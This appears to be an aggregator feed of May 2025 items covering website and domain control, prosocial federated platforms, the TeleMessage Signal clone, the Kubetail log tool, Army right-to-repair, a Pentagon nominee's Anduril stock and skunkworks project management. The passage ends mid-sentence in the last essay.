Some thoughts on how control over web content works
Rachel By The Bay
rachelbythebay.com
2025-05-01 20:42:43
During the lockdown of 2020 and subsequent Twilight Zone times that
followed, I learned a bit about how a local restaurant's web site
operates. That web site had become the lifeline for the business since
everything had turned into takeout or delivery, and it wasn't always
right, so I brought ...
During the lockdown of 2020 and subsequent Twilight Zone times that
followed, I learned a bit about how a local restaurant's web site
operates. That web site had become the lifeline for the business since
everything had turned into takeout or delivery, and it wasn't always
right, so I brought it up with the owner. He said he had "a guy who
takes care of it". This makes sense since his thing was running a
restaurant and keeping that going. He doesn't sit around dealing with
domain names and web sites every day.
At one point "his guy" became unreachable for several months, and the
restaurant owner asked me what my options were since he knew I was "one
of these computer people". I had to lay out the top to bottom of how
this stuff works in terms of "this content gets displayed with this name
on it", and figured it might benefit others if I put some variant of it
online.
Let's say you're the restaurant owner. You're paying some third party to
run a web site and list your menu, hours, and that kind of stuff. They
might also have some kind of thing rigged up to send orders through
online, or an agreement with yet another vendor to do it through them.
You need to get something changed on the site. Maybe your menu changed
and you need to warn people about the increased price of egg-based
products. Maybe you have new hours of operation. Whatever. What
steps can make that happen?
In no particular order, an incomplete list:
"Ask them to change it" - contact your person (people) and ask them to
change it. That's what you're paying them for. You are paying them,
right?
"Change the actual files" - find out how the serving of content works,
gain access to it, and then make changes to the file(s). This requires
account access to whatever they happen to be using to run the site. If
it's just a bunch of flat files on a disk somewhere, it might be easy.
If it's just one entry in a much bigger system, it might not. Also you
have to know how to do this and/or have new people to do this for you
(as with most of the entries in this list).
"Replace the document root" - figure out how the web server works, then
swing your-restaurant.example.com around from their directory to your
directory, or do the equivalent database wrangling if it's some dynamic
thing. This requires some admin powers on the box/system itself.
"Take over the server" - gain admin powers on the box through security
holes or good old-fashioned physical access and single-user mode. Then
go in and change the document root, edit the files, or do whatever else
you feel like doing. Requires security skills and/or physical access to
the server.
"Replace the server" - find out where the server is (assuming it's just
one machine) and then physically replace it with one that you control
but is otherwise configured for the right IP address(es) and whatever
else is required to serve the site. This might mean "unplug the old one
and plug a new one in on the same spot". Requires physical access to
the hosting arrangements, and if it's in the clown, yeah, forget about
it.
"Change the DNS" - get access to whatever controls the DNS zone for that
domain and repoint it to new hosting arrangements with new content
installed. This means changing things like A and AAAA records and/or
CNAMEs. Requires ability to log in to whatever's running the show.
"Change the primary nameservers" - get into the account at the registrar
for the domain and repoint the primary nameservers to ones where you can
set the data for the domain. Continue as above. Requires ability to
log into the registrar account.
"Move the domain to another registrar" - maybe you can't get into the
existing registrar, but maybe you can go through the transfer process to
pull it to another one where you can change the nameservers. Then you
proceed as in that option (above). Requires ability to transfer a
domain, which typically involves a one-time key from the "losing"
registrar, which in turn usually involves access to the account. There
may be legal options for *yoinking* the domain without such access,
assuming you can prove ownership, or otherwise bludgeon the companies
involved into doing what you want.
Basically, if you actually own some of the items in question, you have
options. If you are the owner of the registrar account and it's just
some rando tech person who's a contact on it that does the work, you
authenticate yourself to the registrar out of band, have them removed,
get yourself (or a new tech rando) installed, and continue from there.
The same applies for the DNS serving, or the actual web hosting.
This pattern pretty much plays out everywhere: is it your account? Or,
did you pay them to "take care of everything" and your only "interface"
to it is through them?
I don't think people really know the implications of some of these
setups.
Building an Open Prosocial Web
Internet Exchange
internet.exchangepoint.tech
2025-05-01 13:23:17
What if online platforms were designed to strengthen our social fabric? This week, in our main story, Audrey Tang—Taiwan’s Cyber Ambassador-at-Large, first Digital Minister, and a pioneer of civic tech—and IX’s Audrey Hingle explore how federated platforms can prioritize ...
What if online platforms were designed to strengthen our social fabric? This week, in
our main story
, Audrey Tang—Taiwan’s Cyber Ambassador-at-Large, first Digital Minister, and a pioneer of civic tech—and IX’s Audrey Hingle explore how federated platforms can prioritize social cohesion.
But first...
Introducing “The Stack” – Internet Exchange’s New Bookshop
This week IX launched
The Stack
, a place to find hand-picked reading lists on internet governance, digital rights, and the intersection of technology and society. Plus, 10% of every sale supports our newsletter. Our
debut list
comes from
the infrastructure reading group
run by
critical infrastructure lab
: a bi-weekly meetup that explores the politics, values, and power dynamics embedded in communication infrastructures.
We asked Niels ten Oever, researcher at the University of Amsterdam and convenor of the reading group, to spotlight a few essentials for newcomers:
Technology of Empire
,
Balkan Cyberia
, the Closed World [not available in our shop], and
Reluctant Power
are my favorite books from the reading group. It isn't an accident that these are historical books about infrastructures. They analyze power dynamics in communication networks when the dust has settled. Oftentimes, it is difficult to understand contemporary issues because of all the hype and obfuscation. This reading group taught me that to understand the present, we need to read about networks and technologies from the past, and not be blinded by claims about utopic or dystopian futures. Power and infrastructures are historically deeply entangled – the present is not as new as we tend to think!
If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.
Not ready for a long-term commitment? You can always
leave us a tip
.
The Global Cyber Alliance’s Domain Trust initiative is evolving into an “observatory of action” to collaboratively define and measure effective practices against domain abuse, following strong stakeholder support at its 13th community meeting.
https://globalcyberalliance.org/domain-trust-dctm13
Private group chats on encrypted apps like Signal, led by tech figures such as Marc Andreessen and Sriram Krishnan, have quietly shaped a powerful alliance between Silicon Valley elites and the political right, influencing U.S. discourse and strategy from behind the scenes.
https://www.semafor.com/article/04/27/2025/the-group-chats-that-changed-america
After the U.S. government announced a brief
funding extension
mid April, the CVE Foundation announced further plans to move from sole U.S. government funding to a globally supported, independent nonprofit model.
https://www.thecvefoundation.org
Researchers have uncovered a set of vulnerabilities, dubbed AirBorne, that allow hackers on the same Wi-Fi network to remotely execute code on millions of third-party Apple AirPlay-enabled devices.
https://www.wired.com/story/airborne-airplay-flaws
IndieSky: a working group to build & run community-owned pieces of the AT Protocol stack. Free Our Feeds is supporting the effort with an initial donation. Join the working group! First call
May 8, 9am PST. Online.
https://atprotocol.dev/p/2c5705d3-8755-4be8-b386-557ccba31e94
At the meeting “Memory safety in the EU”, leading organizations in the Secure by Design & Memory Safety space will gather to draft a statement outlining the importance of Memory Safety for Europe’s critical infrastructure and its urgency as part of Secure by Design policy.
May 15, 9:30am CEST. Utrecht, Netherlands.
https://rustweek.org/events/memory-safety-eu
2025 Global Gathering is a three-day event focused on tech and human rights, bringing together global civil society, technologists, and funders to address censorship, surveillance, AI, and internet governance through participant-led sessions.
September 8–10. Estoril, Portugal.
https://www.digitalrights.community/blog/2025-global-gathering-application
OARC45: Technical meeting hosted by DNS-OARC, focused on DNS operations, research, and analysis, bringing together experts to share updates and challenges in the DNS ecosystem.
October 7–8. Stockholm, Sweden.
https://indico.dns-oarc.net/event/55
IEEE Cybersecurity Award for Practice: Nominate individuals or small teams to recognize impactful, real-world contributions to cybersecurity by
May 30.
https://secdev.ieee.org/2025/awards
In the recent research paper
Prosocial Media
, E. Glen Weyl, Luke Thorburn, Emillie de Keulenaar, Jacob Mchangama, Divya Siddarth, and Audrey Tang (co-author of this piece) propose a new approach to platform design that places social cohesion at the centre of online communication. The framework challenges the way most major platforms are currently designed; specifically, how they prioritize keeping users engaged by promoting content that drives clicks, often through outrage or controversy.
The paper argues that while social media platforms draw heavily on the “social fabric”, the network of relationships, affiliations and shared beliefs that structure human communities, they also often undermine it. This is especially true for platforms driven by advertising incentives, which are designed to maximise user attention through emotionally charged, often polarizing content. In contrast, the model proposed in
Prosocial Media
encourages algorithmic curation based on how well content bridges divides between communities, or fairly represents diverse perspectives.
The Role of Federated Platforms
Federated systems like Mastodon and Bluesky are often cited as promising alternatives to centralized platforms. Their decentralized architecture enables greater autonomy and diversity of governance models. However, we emphasize that decentralization alone isn’t enough. Decentralization changes
who
controls the infrastructure, but not
how
that infrastructure shapes social interaction. Without intentional design choices to support dialogue across communities, federated platforms risk replicating the same social fragmentation seen in their centralized counterparts. This makes the current phase of platform development especially significant. As many federated platforms like Bluesky remain in their early stages, there is an opportunity for communities to innovate their own governance solutions, and to embed prosocial principles into their infrastructure.
Current centralized social platforms often amplify division and lack transparency, creating a need for alternatives like "Prosocial Media" that are built in a different way, using decentralized systems that can connect and interact—but don’t rely on a central company—also known as federated principles.
This approach aims to foster understanding and societal health not by arbitrating truth, but by illuminating where people may agree and disagree. It helps make the social context of information visible to reveal "uncommon ground" and build stronger communities and collective resilience.
There is a tension between transparency and privacy. Federated systems try to respect context, empowering individuals and communities to control what data they share and helping them gain clarity within their chosen groups (e.g., "Here is what your communities X and Y agree on"). The goal is to go beyond connecting individuals, and instead nurture real communities through interoperable technology based on open protocols, requiring careful, iterative development to weave a healthier social fabric online.
To realize the promise of a healthier, more coherent digital public space, federated platforms should actively design for prosocial outcomes that strengthen the social fabric.
Highlight content that bridges communities
Design algorithms that prioritize content supported by people from different communities or perspectives. This type of content can help reduce polarization and support shared understanding. Tools like
Polis
and Community Notes offer useful models for identifying and surfacing this kind of broadly supported content.
Label content with social context
Include labels or metadata that show which communities a piece of content appeals to or challenges. This kind of transparency helps users understand how content fits into broader conversations and reduces the false impression that certain views are universally accepted.
Encourage cross-community interaction
Create features that make it easier for people to encounter and engage with ideas outside their immediate circles. This could include curated feeds that show diverse viewpoints, prompts to explore related communities, or spaces for respectful dialogue across groups.
Support new and underrepresented communities
Provide tools and infrastructure that help smaller or emerging communities participate fully in the network. This might include discovery tools, moderation support, or funding models that help them grow and contribute meaningfully to the larger ecosystem.
Adopt shared standards for prosocial signals
To make these prosocial features work across the Fediverse, platforms should agree on common standards for things like content labels, community signals, and cross-platform feedback. Protocols like
Spritely
could help support this kind of interoperable infrastructure.
Embedding these principles into the DNA of federated platforms is a chance to reimagine the digital commons as a space where shared understanding, respectful disagreement and collective flourishing are not side effects, but core design principles.
Mike Waltz Accidentally Reveals Obscure App the Government Is Using to Archive Signal Messages
403 Media
www.404media.co
2025-05-01 22:25:23
A photograph of Trump administration official Mike Waltz's phone shows him using an unofficial version of Signal designed to archive messages during a cabinet meeting....
Mike Waltz, who was until Thursday U.S. National Security Advisor, has inadvertently revealed he is using an obscure and unofficial version of Signal that is designed to archive messages, raising questions about what classification of information officials are discussing on the app and how that data is being secured, 404 Media has found.
On Thursday
Reuters published a photograph
of Waltz checking his mobile phone during a cabinet meeting held by Donald Trump. The screen appears to show messages from various top level government officials, including JD Vance, Tulsi Gabbard, and Marco Rubio.
At the bottom of Waltz’s phone’s screen is a message that looks like Signal’s regular PIN verification message. This sometimes appears to encourage users to remember their PIN, which can stop people from taking over their account.
But the message is slightly different: it asks Waltz to verify his “TM SGNL PIN.” This is not the message that is displayed on an official version of Signal.
Instead TM SGNL appears to refer to a piece of software from a company called TeleMessage which makes clones of popular messaging apps but adds an archiving capability to each of them. A
page on TeleMessage’s website
tells users how to install “TM SGNL.” On that page, it describes how the tool can “capture” Signal messages on iOS, Android, and desktop.
The original image and then a zoomed-in version. Both images credit: REUTERS/Evelyn Hockstein TPX IMAGES OF THE DAY.
In a
video uploaded to YouTube
, TeleMessage says it works on corporate-owned devices as well as bring-your-own-device (BYOD) phones. In the demonstration, two phones running the app send messages and attachments back and forth, and participate in a group chat.
The video claims that the app keeps “intact the Signal security and end-to-end encryption when communicating with other Signal users.”
“The only difference is the TeleMessage version captures all incoming and outgoing Signal messages for archiving purposes,” the video continues.
In other words, the robust end-to-end encryption of Signal as it is typically understood is not maintained, because the messages can be later retrieved after being stored somewhere else. At one point, the video shows copies of those messages in what appears to be an ordinary Gmail account, which would create additional security risks. The video says the Gmail is for the “demo” and that TeleMessage works with “numerous archiving platforms.”
“Let us take care of your Signal archiving and recording requirements,” the video concludes.
The fact that Waltz is using the TeleMessage version of Signal highlights some of the tension and complexity associated with high-ranking government officials communicating about sensitive topics on an app that can be configured to have disappearing messages: Government officials are required to keep records of their communications, but archiving, if not handled correctly, can potentially introduce security risks to those messages.
Neither TeleMessage, Signal, nor representatives of the U.S. government responded to a request for comment.
404 Media found numerous U.S. government contracts that mention TeleMessage specifically. One for around $90,000 from December 2024 says “Telemessage (a Smarsh Co.) Licenses for Text Message Archiving, & WhatsApp and Signal Licenses.”
On Thursday Waltz was pushed out from his role as national security advisor and is now instead Trump’s nominee for ambassador to the United Nations,
multiple media outlets reported
. Waltz was at the center of a political and national security firestorm
when he accidentally added Jeffrey Goldberg
, the editor-in-chief of
The Atlantic,
to a Signal group chat of senior Trump administration officials discussing specific combat plans against Houthi rebels in Yemen. Later
the
New York Times
reported
on a second Signal group chat in which Defense Secretary Pete Hesgeth shared more highly sensitive information with third parties including his wife and brother.
One concern from those group chats was that government officials may not be following record keeping laws for government communications by using Signal. TeleMessage may solve that problem. In the YouTube video, TeleMessage says users of its Signal archiving tool will remain “compliant with regulations” and that the tool supports “full company archival compliance.”
Government agencies have paid for versions of encrypted messaging apps that also have archive abilities before. In 2021, Customs and Border Protection (CBP)
paid encrypted app company Wickr $700,000
. Wickr offers an enterprise version of its product that can archive messages for auditing purposes. That deal was with the encrypted app developer itself, and not a third party like TeleMessage.
Matthew Gault provided additional reporting.
About the author
Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.
Show HN: Kubetail – Real-time log search for Kubernetes
Kubetail
is a general-purpose logging dashboard for Kubernetes, optimized for tailing logs across across multi-container workloads in real-time. With Kubetail, you can view logs from all the containers in a workload (e.g. Deployment or DaemonSet) merged into a single, chronological timeline, delivered to your browser or terminal.
The primary entry point for Kubetail is the
kubetail
CLI tool, which can launch a local web dashboard on your desktop or stream raw logs directly to your terminal. Behind the scenes, Kubetail uses your cluster's Kubernetes API to fetch logs directly from your cluster, so it works out of the box without needing to forward your logs to an external service first. Kubetail also uses your Kubernetes API to track container lifecycle events in order to keep your log timeline in sync as containers start, stop or get replaced. This makes it easy to follow logs seamlessly as user requests move from one ephemeral container to another across services.
Our goal is to build the most powerful, user-friendly logging platform for Kubernetes and we'd love your input. If you notice a bug or have a suggestion please create a GitHub Issue or send us an email (
hello@kubetail.com
)!
Features
Clean, easy-to-use interface
View log messages in real-time
Filter logs by:
Workload (e.g. Deployment, CronJob, StatefulSet)
Absolute or relative time range
Node properties (e.g. availability zone, CPU architecture, node ID)
Grep
Uses your Kubernetes API to retrieve log messages so data never leaves your possession (private by default)
Web dashboard can be installed on desktop or in cluster
Switch between multiple clusters (Desktop-only)
Quickstart (Desktop)
Option 1: Homebrew
First, install the Kubetail CLI tool (
kubetail
) via
homebrew
:
Next, start the web dashboard using the
serve
subcommand:
This command will open
http://localhost:7500/
in your default browser. Have fun viewing your Kubernetes logs in realtime!
First, create a namespace for the Kubetail resources:
kubectl create namespace kubetail-system
Next, choose your authentication mode (
cluster
or
token
) and apply the latest manifest file:
# For cluster-based authentication use kubetail-clusterauth.yaml:kubectl apply -f https://github.com/kubetail-org/helm-charts/releases/latest/download/kubetail-clusterauth.yaml
# For token-based authentication use kubetail-tokenauth.yaml:kubectl apply -f https://github.com/kubetail-org/helm-charts/releases/latest/download/kubetail-tokenauth.yaml
To access the web dashboard you can use your usual access methods such as
kubectl port-forward
:
To install Kubetail using
Glasskube
, you can select "Kubetail" from the "ClusterPackages" tab in the Glasskube GUI then click "install" or you can run the following command:
glasskube install kubetail
Once Kubetail is installed you can use it by clicking "open" in the Glasskube GUI or by using the
open
command:
Have fun viewing your Kubernetes logs in realtime!
We're building the most
user-friendly
,
cost-effective
, and
secure
logging platform for Kubernetes and we'd love your contributions! Here's how you can help:
A new memo from Secretary of Defense Pete Hegseth is calling on defense contractors to grant the Army the right-to-repair. The
Wednesday memo
is a document about “Army Transformation and Acquisition Reform” that is largely vague but highlights the very real problems with IP constraints that have made it harder for the military to repair damaged equipment.
Hegseth made this clear at the bottom of the memo in a subsection about reform and budget optimization. “The Secretary of the Army shall…identify and propose contract modifications for right to repair provisions where intellectual property constraints limit the Army's ability to conduct maintenance and access the appropriate maintenance tools, software, and technical data—while preserving the intellectual capital of American industry,” it says. “Seek to include right to repair provisions in all existing contracts and also ensure these provisions are included in all new contracts.”
Over the past decade, corporations have made it difficult for people to repair their own stuff and, somehow, the military is no exception. Things are often worse for the Pentagon. Many of the contracts it signs for weapons systems come with decades long support and maintenance clauses. When officials dig into the contracts they’ve often found that contractors are overcharging for basic goods or intentionally building weapons with proprietary parts and then charging the Pentagon exorbitant fees for access to replacements. 404 Media wrote more about this problem several months ago. The issue has gotten so bad that appliance manufacturers and tractor companies have lobbied against bills that would make it easier for the
military to repair its equipment
.
This has been a huge problem for decades. In the 1990s, the Air Force bought Northrop Grumman’s B-2 Stealth Bombers for about $2 billion each. When the Air Force signed the contract for the machines, it paid $2.6 billion up front
just
for spare parts
. Now, for some reason, Northrop Grumman isn’t able to supply replacement parts anymore. To fix the aging bombers, the military has had to
reverse engineer
parts and do repairs themselves.
Similarly, Boeing screwed over the DoD on replacement parts for the C-17 military transport aircraft to the tune of at least $1 million. The most egregious example was a common soap dispenser. “One of the 12 spare parts included a lavatory soap dispenser where the Air Force paid more than 80 times the commercially available cost or a 7,943 percent markup,” a
Pentagon investigation found
. Imagine if they’d just used a 3D printer to churn out the part it needed.
As the cost of everything goes up, making it easier for the military to repair their own stuff makes sense. Hegseth’s memo was praised by the right-to-repair community. “This is a victory in our work to let people fix their stuff, and a milestone on the campaign to expand the Right to Repair. It will save the American taxpayer billions of dollars, and help our service members avoid the hassle and delays that come from manufacturers’ repair restrictions,” Isaac Bowers, the Federal Legislative Director of U.S. PIRG,
said in a statement
.
The memo would theoretically mean that the Army would refuse to sign contracts with companies that make it difficult to fix what it sells to the military. The memo doesn’t carry the force of law, but subordinates do tend to follow the orders given within. The memo also ordered the Army to stop producing Humvees and some other light vehicles, and Breaking Defense
confirmed that it had
.
With the Army and the Pentagon returning to an era of DIY repairs, we’ll hopefully see the return of
PS: The Preventive Maintenance Monthly
. Created by comics legend Will Eisner in 1951, the Pentagon funded comic book was a monthly manual for the military on repair and safety. It included sultry M-16 magazines and anthropomorphic M1-Abrams explaining how to conduct repairs.
The Pentagon stopped publishing the comic in 2019, but with the new push in the DoD for right-to-repair maybe we’ll see its return. It’s possible in the future we’ll see a comic book manual on repairing a cartoon MQ-9 Reaper that leers at the reader with a human face.
Image via The Internet Archive.
About the author
Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.
Trump's Pick for a Top Army Job Works at a Weapons Company — And Won't Give Up His Stock
Intercept
theintercept.com
2025-05-01 21:30:22
Mike Obadal’s plan to keep his stock in Anduril if nominated as under secretary of the Army is a blatant conflict of interest, experts say.
The post Trump’s Pick for a Top Army Job Works at a Weapons Company — And Won’t Give Up His Stock appeared first on The Intercept....
Trump’s nominee for
under secretary of the Army, Michael Obadal, retired from a career in the Army in 2023, then spent the past two years working for Anduril, the ascendant arms maker with billions of dollars in Army contracts.
If confirmed to the Pentagon post — often described as the “chief operating officer” position at the largest branch of the U.S. military — Obadal plans to keep his stock in Anduril, according to an
ethics disclosure
reviewed by The Intercept.
“This is unheard of for a presidential appointee in the Defense Department to retain a financial interest in a defense contractor,” said Richard Painter, the top White House ethics lawyer during the George W. Bush administration. Painter said that while the arrangement may not be illegal, it certainly creates the appearance of a conflict of interest. Under the norms of prior administrations, Painter said, “nobody at upper echelons of the Pentagon would be getting anywhere near contracts if he’s sitting on a pile of defense contractor stock.”
Obadal has been a senior director at Anduril since 2023, according to his LinkedIn profile, following a nearly 30-year career in the U.S. Army. While the
revolving door
between
the Pentagon and defense industry
is as
old
as both of those institutions, federal law and ethical norms require employees of the executive branch to unload financial interests and relationships that might create a conflict of interest in the course of their duties.
Obadal’s April 11 financial disclosure letter, filed with the Office of Government Ethics, states “Upon confirmation, I will resign from my position as Senior Director at Anduril Industries” and forfeit his right to unvested stock options. But crucially, Obadal says he will retain his restricted stock units that have already vested — i.e., Anduril stock he already owns. That means he will continue to own a piece of the company, whose valuation has
reportedly
increased from $8.5 billion when Obadal joined to $28 billion today on the strength of its military contracts, and stands to materially benefit from anything that helps Anduril.
In his ethics letter, Obadal says he “will not participate personally and substantially in any particular matter that to my knowledge has a direct and predictable effect on the financial interests of Anduril Industries” — unless he’s given permission by his boss, the secretary of the Army.
Don Fox, former acting director of the Office of Government Ethics, told The Intercept Obadal’s Anduril shares could pose a clear conflict of interest if he is confirmed. “The general reason an appointee would be allowed to maintain a potentially conflicting interest is because divestiture is either not possible or highly impractical.” Anduril is privately held, meaning shares in the company can’t be quickly disposed of on the stock market.
But Painter, the Bush-era ethics lawyer, suggests that Obadal could liquidate his stake in Anduril through the
lively secondary market
in its shares. “In the Bush years, we’d just say ‘You’re not going to the Pentagon,” said Painter.
Fox said that if Obadal adheres to what’s in his ethics agreement and recuses himself from anything that touches Anduril, he will stay in compliance with federal law. “That’s going to be a pretty broad recusal,” added Painter, who speculated, “He’s going to have to recuse from any weapons systems that might use [Anduril] equipment, anything having to do with contracts, even competitor companies.”
Fox, who spent decades as a lawyer at the Air Force and Navy, speculated that a vast recusal from budgetary matters “is feasible, but he’s going to have to be really scrupulous about it,” to the point of literally leaving the room whenever Anduril, its capabilities, or those of its competitors are discussed. “Once we get into areas that involve hardware and software, I’d say don’t even be in the room,” he said. “At a really senior level, people are not only looking for what you say but what you don’t say,” Fox added. “It poses a significant risk to him personally of crossing that line, no matter how scrupulous he may be.”
William Hartung, a senior research fellow at the Quincy Institute for Responsible Statecraft who focuses on the U.S. arms industry, describes the situation as “the very definition of a conflict of interest” given the vast business interests between Obadal’s current and new employer. “The fact that the administration and the Congress have accepted this arrangement is a commentary on the sad state of ethics in Washington — an indication that too many of our elected officials won’t even
try
to take steps to make it harder to engage in corrupt practices,” Hartung added.
As its second
-highest
ranking civilian at the Army, Obadal will have considerable sway over what weapons the Army purchases, what technologies it prioritizes, and when and how the U.S. wages war. Having a former employee and current shareholder in that position may prove lucrative for Anduril as the company seeks to add to its billions of dollars of federal contracts.
In the past year alone, during Obadal’s time at the company, Anduril
announced
it was taking over the Army’s Integrated Visual Augmentation System, a troubled $22 billion program intended to provide soldiers with augmented reality goggles and
selling
the Army components for its rocket artillery systems and a fleet of
miniature
“Ghost-X” helicopter drones. Anduril is also working on the Army’s TITAN system, a truck-mounted sensor suite, and an experimental U.S. Army’s Robotic Combat Vehicle program.
Last year, DefenseOne reported that the Army’s “unfunded priorities” tech wishlist included “$4.5 million in research and development for Anduril’s Roadrunner-M drone interceptor.” Obadal described that jet-powered bomb drone in a LinkedIn
post
as “revolutionary.”
The White House declined to comment on the ethics agreement and referred The Intercept to the Office of the Secretary of Defense, which also declined to comment and referred The Intercept to the Army, which referred The Intercept back to the White House. Neither Anduril nor Obadal responded to a request for comment.
In December, the New York Times
reported
Trump’s transition team offices were “crawling with executives from defense tech firms with close ties to Mr. Trump’s orbit,” including Anduril. The month before, Anduril co-founder and longtime Trump booster Palmer Luckey told
Bloomberg
he was already “in touch” with the incoming administration about impending nominees: “I don’t want to throw any (names) out there because I would be happy with all of them.”
Since moving from academic research to industry in 2017, I’ve worked on two software projects. Each one started as a small, clean-slate
1
skunkworks effort involving 2-3 people and gradually expanded to a large, conventional software engineering effort with dozens of engineers. The first of these (from 2017 to 2021) was
Delos
at Meta, a Chubby/ZooKeeper/etcd-like control plane storage system. The second was a new Kafka engine (from 2022 to 2024) that can run on any disaggregated storage layer (and powers the Confluent Freight product, where S3 is used as that storage layer). Nearly every system at Meta depends in some way on Delos as of 2025 (e.g., this
article
describes an example dependency chain); Confluent Freight just became
generally available
and time will tell if it succeeds commercially, though early results are promising.
While these systems were technically difficult to build and operate (particularly given their critical roles in the stacks of the respective companies), I found that much of the challenge lay in the management of these projects. Even the most innovative companies on the planet have incentive structures (for line managers and engineers) that are incompatible with clean-slate skunkworks innovation. In my discussions with various managers over the last few years, I found myself converging on a set of key principles, which I outline in this article. I hope these rules are helpful for other engineers and managers looking to define a shared set of principles for their own skunkworks projects.
Some caveats: I am an engineer, not a manager, and have never managed anything in my life beyond a handful of interns and graduate students; this is just my wish-list as a technical project lead / architect for what I need from managers. These rules may be highly specific to building new storage services at large companies. At some point, the project has to exit skunkworks mode and these rules cease to apply. My sample size is N=2 and it’s difficult to establish that these rules are causally related (or even just correlated) to project success.
A. No non-coding architects:
If you want to participate in designing the system, you have to write code. (Note that it’s okay to not code if you are bringing some particular expertise to the table: e.g., if you are a world-class erasure coding theorist. It might also be okay if you are a world-class ops specialist, though in my experience most such people are very comfortable with code). If there’s anyone on the team whose only job is to delegate work to other people, something has gone extremely wrong.
B. No individual “ownership”:
Everyone is responsible for everything. If the boat sinks, everyone sinks with it; there’s no way to win or lose independently. We want people accelerating and enabling each other to expand the pie, not competing with each other on a fixed pie. We want zero tolerance for self-promoting activity: it is the job of the manager and the TLs to make sure that people are rewarded fairly based on what they actually did. The best managers of such teams tell them to run as fast as possible and get the job done; and take the burden of justifying ratings completely off the engineers. If the need to safeguard an engineer’s rating begins to shape the project’s priorities, something has gone extremely wrong.
C. Operate on strengths, not weaknesses:
We want each person to focus on what they are truly good at; rather than what they are weakest at. The latter often happens in a big company setup when engineers want to get promoted; and managers tell them to focus on the areas that are holding them back. If engineers ask managers what will get them promoted, the answer has to be “run as fast as you can and make the team ship”. If that person cannot get objectively promoted under those circumstances, something has gone extremely wrong: the project is not impactful enough to warrant a skunkworks approach; or the person should not be on this project (e.g., maybe their skillset is not needed on the project, or they are not good enough in their assumed area of expertise, etc.).
D. Formal communication (exposed outside the team) has to be extremely precise, high-quality, and reviewed:
To paraphrase Jeff Bezos, we want “crisp documents and messy meetings”. Different constituencies need different types of messaging: some may need to know about technically impressive details; others may want to know about business impact; some may need to know what’s happening next month and others may need to know what’s happening in 3 years. Writing a single document with that kind of versatility takes months even for experienced writers. Everything the team says publicly impacts its reputation and credibility; and constrains its actions in the future. Note that this is not at odds with transparency: informal communication should happen at all levels with the utmost transparency, since it’s typically easy to convey nuance and context when discussing things informally.
E. Avoid a first-doc-wins culture.
Having a single person write a public-facing doc has a chilling effect on design engagement within the team; it “muddies the pool”. We want less experienced members of the team to experience the rush of discovering (or re-discovering) ideas; it’s a part of the training process. Public-facing docs should be written after a design process and authored collaboratively. We should not reward docs as deliverables. (None of this applies to internal communication within the team, which can happen in any form and quality level that the team likes).
F. Reward on impact:
Everyone on the team has the same rules: they will be rewarded when the project ships in some form. No promotions until something ships (unless someone on the team is already long-due for a promotion). On the flip side, we guarantee reasonable baseline ratings even if there’s no shipped impact. Basically we take out both the upside and the downside for engineers until something ships.
G. Minimize dependencies:
Dependencies take a lot of time (external teams often have multiple priorities). They can create uneven quality across the project. Air-gaps can show up in the design. One failure mode is that external teams often specialize in specific solutions rather than a problem domain; so asking an external team to “build a component to solve X” often translates into “modify our existing solution Y to solve X”, which can add a ton of accidental complexity. Note that “reward on impact” incentives force the team to be careful about dependencies: if they do their job perfectly but a dependency fails to show up, the team does not get rewarded. In practice, this ensures that the team only takes a dependency if it absolutely makes sense and they are comfortable with the risk profile.
H. Understand the hierarchy of needs for a new project:
For some technical problems, the slope of progress is continuous: it’s easy to get an initial version that works somewhat well and then incrementally improve it, but quite hard to get to an ideal version (e.g., a multi-tenant load-balancer can require years of tinkering with policies). Other problems have a discrete progression: it’s difficult to get to a reasonable v0, but after that you can pretty much leave it alone (e.g., a consensus protocol that’s only used on reconfigurations). In a mature 1-to-10 system, managers and engineers will spend most of their time on the former class of problems; as a result, it may be tempting to prioritize the same problems in a 0-to-1 system. But in a brand new database (for example), it’s far more important to have a working consensus protocol than to have excellent load-balancing in your first release.
I. Hire Pigs, not Chicken:
Pigs are full-time engineers committed to a project; whereas Chicken are part-time engineers involved in the project. We want to bias towards a small number of Pigs rather than a larger number of Chicken. Note that this is not a question of competence: even the best chicken can hurt velocity and undermine the sense of shared fate in a project.
J. Eliminate process ruthlessly:
This one should be obvious: a small team does not need process. Do not impose any make-work activity on the team. Free them up to execute. A manager’s role in this setup is to provide inspirational leadership and motivate the troops, rather than manage / limit risk.
K. Progressively overload the team:
Pick goals for the team that are ambitious and just a little bit impossible. This has two effects: one, it forces the team to prioritize ruthlessly, where you cut out anything inessential for success; and two, it pushes the team to somehow find leverage through system design, where you find new ways to deliver the same result without as much code / complexity because you literally don’t have cycles to write the code / manage the complexity.
L. Do not exit skunkworks mode prematurely:
It makes sense to exit skunkworks mode once execution risk begins to dominate design risk. However, there’s a second consideration: ideally, the team stays in skunkworks mode until it achieves some kind of actual success, i.e., something ships. To understand why, consider that a key reason to create a skunkworks project is to incubate a new type of culture within an incumbent org. Over time, we can create more conventional-looking ancillary teams around the core project, creating a composite of the new culture and the incumbent one. But timing is critical; if we expand before anything ships, the incumbent culture will drown out the new one (which makes sense, since the new culture has no success to back it).
M. Fail-fast vs. Zombie mode:
New, risky projects often have to operate in uncertain environments where our assumptions (about the market, hardware, customers) are shifting rapidly. It’s better to move quickly and try something rather than aim for perfect decision making; and to stop quickly rather than allow the project to meander, consume resources / attention, and incur opportunity cost. If we can fail fast and recover quickly, bad decisions don’t matter as much; and we get data for the next attempt. Failing fast on any endeavor requires us to establish concrete criteria for determining its success in some short time-frame (e.g., 3-6 months) before starting work. Fail-fast works for entire projects, but also for smaller decisions within the project (e.g., personnel assignments) or even as a philosophy for building the system (in effect, we can always convert throughput into goodput via rapid iteration on failures).
N. We want R&D, not !R&!D:
R&D projects can often end up in no-man’s land, partly because it’s difficult to hold these projects accountable and measure their success. Ideally we want the project to be good “R” (publishable in top conferences) and good “D” (shipping to production). An anti-pattern is if external researchers think the project must be “D” (since it’s obviously not good “R”) and external developers think the project must be “R” (since it’s obviously not good “D”).
O. Synchronous, frequent, informal communication is critical:
Prioritizing daily synchronous communication is critical. Note that this meeting is not for listing and managing work items (nobody wants a stressful daily stand-up in a skunkworks project); its goal is to build a shared understanding of the design space; and a shared set of values for assessing points in that space. We want to encourage free-wheeling debate on designs, long-term strategy, and short-term tactics; and train engineers to collaboratively think and
talk about design
